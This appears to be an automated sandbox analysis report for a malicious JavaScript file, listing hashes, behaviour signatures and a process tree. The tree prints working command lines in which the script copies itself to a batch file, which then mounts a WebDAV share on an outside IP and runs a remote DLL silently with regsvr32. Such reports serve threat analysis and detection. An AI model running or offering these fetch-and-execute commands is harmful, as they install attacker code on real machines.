Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
10-07-2024 15:43
General
-
Target
2419917728311676320.js
-
Size
5KB
-
MD5
803773aeb4ffb459d09abdb44d050c75
-
SHA1
1ae0d3388bcf5f507c474da66e28398bd1b3ae73
-
SHA256
f4dc317e00002ec2675c347bdf4f48c67971484b30b1b13dfa08ac1a594d0556
-
SHA512
7ade6c959004fff0f4969106c5d7c09f181e2ddded2ad7fcc69226f9491913838990ec32606fab7bc72ea44cb6ed7eac2ba4610c3bf9435f423d4d80515303c9
-
SSDEEP
96:lL87fjdy4ykX5Gz/YB1lBSciTf5meO0iRZeSkye5:W7fJy4TX5q/YB1lBSciTf5m/0iRZDkyG
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2419917728311676320.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2419917728311676320.js" "C:\Users\Admin\\eugmlm.bat" && "C:\Users\Admin\\eugmlm.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\229.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5803773aeb4ffb459d09abdb44d050c75
SHA11ae0d3388bcf5f507c474da66e28398bd1b3ae73
SHA256f4dc317e00002ec2675c347bdf4f48c67971484b30b1b13dfa08ac1a594d0556
SHA5127ade6c959004fff0f4969106c5d7c09f181e2ddded2ad7fcc69226f9491913838990ec32606fab7bc72ea44cb6ed7eac2ba4610c3bf9435f423d4d80515303c9